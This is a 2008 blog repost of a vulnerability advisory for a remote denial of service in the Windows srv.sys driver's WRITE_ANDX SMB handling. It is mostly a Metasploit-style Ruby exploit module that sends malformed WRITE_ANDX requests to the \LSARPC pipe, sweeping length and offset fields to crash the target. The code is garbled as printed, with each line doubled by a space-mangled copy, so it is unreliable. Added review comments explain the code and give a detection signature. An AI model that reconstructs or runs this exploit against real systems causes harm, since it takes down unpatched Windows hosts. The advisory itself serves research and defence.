
Thursday, September 18, 2008

Microsoft Windows WRITE_ANDX SMB Handling Remote Denial of Service

image Microsoft Windows is a commercial operating system. The Microsoft Windows srv.sys driver mishandles WRITE_ANDX SMB requests; a remote attacker could exploit this flaw to mount a denial-of-service attack against the system.
The srv.sys and npfs.sys drivers mishandle specially constructed WRITE_ANDX SMB messages, which can trigger a kernel-level denial of service. A remote attacker does not need valid credentials on the target machine to exploit this flaw. For the attack to succeed, the attacker only needs to send the WRITE_ANDX message remotely to one of the well-known named-pipe endpoints used as interfaces. On Windows these interfaces allow NULL sessions; on Vista the flaw can be exploited successfully via \LSARPC.

Reference http://www.securityfocus.com/archive/1/496354

SEBUG security recommendations:

No fix is available yet; vendor information: http://www.microsoft.com/windows/default.mspx

Testing methods:

[www.sebug.net]
The following program (method) may be harmful; it is provided for security research and teaching purposes only, and is used at your own risk!

 require 'msf/core' require 'msf / core' 
# NOTE(review): this listing is garbled as published — every statement appears
# twice on one line (the original followed by a space-mangled copy), so it is
# not valid Ruby as shown. The comments below describe only the visible
# structure and do not repair the code.
#
# Metasploit-style module exercising the srv.sys/npfs.sys WRITE_ANDX handling
# flaw described in the advisory text above. Nothing in the exploit body
# references a payload, so the observable outcome is a crash/hang on the
# target (denial of service), not code execution — relevant when rating impact.
module Msf module Msf
module Exploits module Exploits
module Test module Test

class BugTest < Msf::Exploit::Remote class BugTest <Msf:: Exploit:: Remote

include Exploit::Remote::SMB include Exploit:: Remote:: SMB

# Module metadata only. The 'Payload' => { 'Space' => 1000 } entry is declared
# but no payload is used anywhere in the visible code; the single target
# 'Windows VISTA' carries no offsets or return addresses, consistent with a
# crash-only test module.
def initialize(info = {}) def initialize (info = ())
super(update_info(info, super (update_info (info,
'Name' => 'test exploit', 'Name' => 'test exploit',
'Description' => 'Description' =>
"tests",
'Author' => 'tests', 'Author' => 'tests',
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Version' => '$Revision: 0 $', 'Version' => '$ Revision: 0 $',
'Arch' => 'x86', 'Arch' => 'x86',
'Payload' => 'Payload' =>
{ (
'Space' => 1000 'Space' => 1000
}, )
'Targets' => 'Targets' =>
[
[
'Windows VISTA', 'Windows VISTA',
{ (
'Platform' => 'win' 'Platform' => 'win'
} )
],
],
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
end

# Sends one NT_CREATE_ANDX (opening a named pipe) followed by one WRITE_ANDX
# whose length/offset header fields are taken from the arguments rather than
# derived from the data actually attached.
#
#   dlenlow    - value written into the WRITE_ANDX DataLenLow field
#   doffset    - value written into the WRITE_ANDX DataOffset field
#   fillersize - number of random bytes attached as data; the same value is
#                written into Remaining and ByteCount
#
# Side effects: overwrites the SMB credential entries in the datastore, then
# calls connect() and smb_login() on every invocation. No disconnect is
# visible in this method, so each call from the caller's loop presumably
# leaves a session open — TODO confirm whether the framework cleans up.
def subexploit(dlenlow, doffset,fillersize) def subexploit (dlenlow, doffset, fillersize)

print_line("1") print_line ( "1")

# Hard-coded test credentials ('testuser' / 'testuser', domain and host
# 'COBAYA') are written unconditionally, overriding whatever the operator
# configured. Note for log review: an authenticated session as this user
# precedes the malformed write.
datastore['SMBUser']='testuser' datastore [ 'SMBUser'] = 'testuser'
datastore['SMBPass']='testuser' datastore [ 'SMBPass'] =' testuser '
datastore['SMBDomain']='COBAYA' datastore [ 'SMBDomain'] = 'COBAYA'
datastore['SMBName']='COBAYA' datastore [ 'SMBName'] = 'COBAYA'

print_line("2") print_line ( "2")

connect() connect ()

print_line("3") print_line ( "3")

smb_login() smb_login ()

print_line("4") print_line ( "4")

# First request: NT_CREATE_ANDX built by hand from the framework's packet
# struct. Flags1/Flags2 are fixed; the session identifiers (MultiplexID,
# TreeID, UserID, ProcessID) are copied from the live client state,
# presumably so the request is accepted as part of the authenticated session.
pkt = CONST::SMB_CREATE_PKT.make_struct pkt = CONST:: SMB_CREATE_PKT.make_struct

pkt['Payload']['SMB'].v['Flags1'] = 0x18 pkt [ 'Payload'] [ 'SMB']. v [ 'Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0xc807 pkt [ 'Payload'] [ 'SMB']. v [ 'Flags2'] = 0xc807

pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i pkt [ 'Payload'] [ 'SMB']. v [ 'MultiplexID'] = simple.client.multiplex_id.to_i
pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i pkt [ 'Payload'] [ 'SMB']. v [ 'TreeID'] = simple.client.last_tree_id.to_i
pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i pkt [ 'Payload'] [ 'SMB']. v [ 'UserID'] = simple.client.auth_user_id.to_i
pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i pkt [ 'Payload'] [ 'SMB']. v [ 'ProcessID'] = simple.client.process_id.to_i

pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX pkt [ 'Payload'] [ 'SMB']. v [ 'Command'] = CONST:: SMB_COM_NT_CREATE_ANDX

pkt['Payload']['SMB'].v['WordCount'] = 24 pkt [ 'Payload'] [ 'SMB']. v [ 'WordCount'] = 24

pkt['Payload'].v['AndX'] = 255 pkt [ 'Payload']. v [ 'AndX'] = 255
pkt['Payload'].v['AndXOffset'] = 0xdede pkt [ 'Payload']. v [ 'AndXOffset'] = 0xdede
pkt['Payload'].v['FileNameLen'] = 14 pkt [ 'Payload']. v [ 'FileNameLen'] = 14
pkt['Payload'].v['CreateFlags'] = 0x16 pkt [ 'Payload']. v [ 'CreateFlags'] = 0x16
pkt['Payload'].v['AccessMask'] = 0x2019f # Maximum Allowed pkt [ 'Payload']. v [ 'AccessMask'] = 0x2019f # Maximum Allowed
pkt['Payload'].v['ShareAccess'] = 7 pkt [ 'Payload']. v [ 'ShareAccess'] = 7
pkt['Payload'].v['CreateOptions'] = 0x400040 pkt [ 'Payload']. v [ 'CreateOptions'] = 0x400040
pkt['Payload'].v['Impersonation'] = 2 pkt [ 'Payload']. v [ 'Impersonation'] = 2
pkt['Payload'].v['Disposition'] = 1 pkt [ 'Payload']. v [ 'Disposition'] = 1
# The file name bytes look like the UTF-16LE string "\LSARPC" preceded by one
# pad byte (14 bytes, matching FileNameLen above and the \LSARPC endpoint
# named in the advisory text) — TODO confirm against the framework's SMB
# string encoding.
pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00" pkt [ 'Payload']. v [ 'Payload'] = "\ x00 \ \ \ x00L \ x00S \ x00A \ x00R \ x00P \ x00C" + "\ x00 \ x00"


simple.client.smb_send(pkt.to_s) simple.client.smb_send (pkt.to_s)

print_line("5") print_line ( "5")

# The create response is parsed only to obtain the FileID that the WRITE_ANDX
# below refers to; no status check is visible.
ack = simple.client.smb_recv_parse(CONST::SMB_COM_NT_CREATE_ANDX) ack = simple.client.smb_recv_parse (CONST:: SMB_COM_NT_CREATE_ANDX)

# Second request: WRITE_ANDX against the pipe handle just opened.
pkt = CONST::SMB_WRITE_PKT.make_struct pkt = CONST:: SMB_WRITE_PKT.make_struct

# Computed but never used below — the DataOffset field is set from the
# doffset argument instead.
data_offset = pkt.to_s.length - 4 data_offset = pkt.to_s.length - 4

print_line("6") print_line ( "6")

# Random data of the size requested by the caller (72 bytes in the visible
# caller); this is the only data actually attached to the message.
filler = Rex::Text.rand_text(fillersize) filler = Rex:: Text.rand_text (fillersize)

print_line("7") print_line ( "7")

# Signature1/Signature2 hold the constant 0xcccccccc rather than a computed
# signature; Reserved2 is -1; DataLenHigh and DataOffsetHigh are fixed.
# The fields the author marked with "#<====" are the ones driven by the
# arguments: DataLenLow (dlenlow) and DataOffset (doffset) may claim far more
# data, at a far larger offset, than the fillersize bytes actually present,
# so the header's length/offset claims are inconsistent with the message body.
# Detection angle: WRITE_ANDX requests whose DataOffset/DataLength point
# outside the received SMB message are the observable signature of this probe.
pkt['Payload']['SMB'].v['Signature1']=0xcccccccc pkt [ 'Payload'] [ 'SMB']. v [ 'Signature1'] = 0xcccccccc
pkt['Payload']['SMB'].v['Signature2']=0xcccccccc pkt [ 'Payload'] [ 'SMB']. v [ 'Signature2'] = 0xcccccccc
pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i pkt [ 'Payload'] [ 'SMB']. v [ 'MultiplexID'] = simple.client.multiplex_id.to_i
pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i pkt [ 'Payload'] [ 'SMB']. v [ 'TreeID'] = simple.client.last_tree_id.to_i
pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i pkt [ 'Payload'] [ 'SMB']. v [ 'UserID'] = simple.client.auth_user_id.to_i
pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i pkt [ 'Payload'] [ 'SMB']. v [ 'ProcessID'] = simple.client.process_id.to_i
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_WRITE_ANDX pkt [ 'Payload'] [ 'SMB']. v [ 'Command'] = CONST:: SMB_COM_WRITE_ANDX
pkt['Payload']['SMB'].v['Flags1'] = 0x18 pkt [ 'Payload'] [ 'SMB']. v [ 'Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0xc807 pkt [ 'Payload'] [ 'SMB']. v [ 'Flags2'] = 0xc807
pkt['Payload']['SMB'].v['WordCount'] = 14 pkt [ 'Payload'] [ 'SMB']. v [ 'WordCount'] = 14
pkt['Payload'].v['AndX'] = 255 pkt [ 'Payload']. v [ 'AndX'] = 255
pkt['Payload'].v['AndXOffset'] = 0xdede pkt [ 'Payload']. v [ 'AndXOffset'] = 0xdede
pkt['Payload'].v['FileID'] = ack['Payload'].v['FileID'] pkt [ 'Payload']. v [ 'FileID'] = ack [ 'Payload']. v [ 'FileID']
pkt['Payload'].v['Offset'] = 0 pkt [ 'Payload']. v [ 'Offset'] = 0
pkt['Payload'].v['Reserved2'] = -1 pkt [ 'Payload']. v [ 'Reserved2'] = -1
pkt['Payload'].v['WriteMode'] = 8 pkt [ 'Payload']. v [ 'WriteMode'] = 8
pkt['Payload'].v['Remaining'] = fillersize pkt [ 'Payload']. v [ 'Remaining'] = fillersize
pkt['Payload'].v['DataLenHigh'] = 0 pkt [ 'Payload']. v [ 'DataLenHigh'] = 0
pkt['Payload'].v['DataLenLow'] = dlenlow #<================== pkt [ 'Payload']. v [ 'DataLenLow'] = dlenlow #<==================
pkt['Payload'].v['DataOffset'] = doffset #<==== pkt [ 'Payload']. v [ 'DataOffset'] = doffset #<====
pkt['Payload'].v['DataOffsetHigh'] = 0xcccccccc #<==== pkt [ 'Payload']. v [ 'DataOffsetHigh'] = 0xcccccccc #<====
pkt['Payload'].v['ByteCount'] = fillersize#<==== pkt [ 'Payload']. v [ 'ByteCount'] = fillersize #<====
pkt['Payload'].v['Payload'] = filler pkt [ 'Payload']. v [ 'Payload'] = filler

print_line("8") print_line ( "8")

# The write is sent without reading a response; success or failure is
# only visible as the target crashing (or not).
simple.client.smb_send(pkt.to_s) simple.client.smb_send (pkt.to_s)

print_line("9") print_line ( "9")

end

# Entry point. Sweeps DataOffset (j) and DataLenLow (i) from 0xffff downward
# in steps of 10000 while each stays above 10000, with the filler size (k)
# fixed at 72 bytes, calling subexploit for every (i, j, k) combination.
# The bare `rescue` (StandardError) only prints "rescue" and continues, so a
# failed connect/login, a reset connection and an unresponsive target are all
# treated alike and the sweep keeps running until the counters are exhausted.
# Nested `while` loops with hand-maintained counters are not idiomatic Ruby;
# left as published.
def exploit def exploit

k=72 k = 72
j=0xffff j = 0xffff
while j>10000 while j> 10000
i=0xffff i = 0xffff
while i>10000 while i> 10000
begin
print_line("datalenlow=#{i} dataoffset=#{j} fillersize=#{k}") print_line ( "datalenlow = # (i) dataoffset = # (j) fillersize = # (k)")
subexploit(i,j,k) subexploit (i, j, k)
rescue
print_line("rescue") print_line ( "rescue")
end
i=i-10000 i = i-10000
end
j=j-10000 j = j-10000
end

end

end

end
end
end


Scott said...

Nice article including code.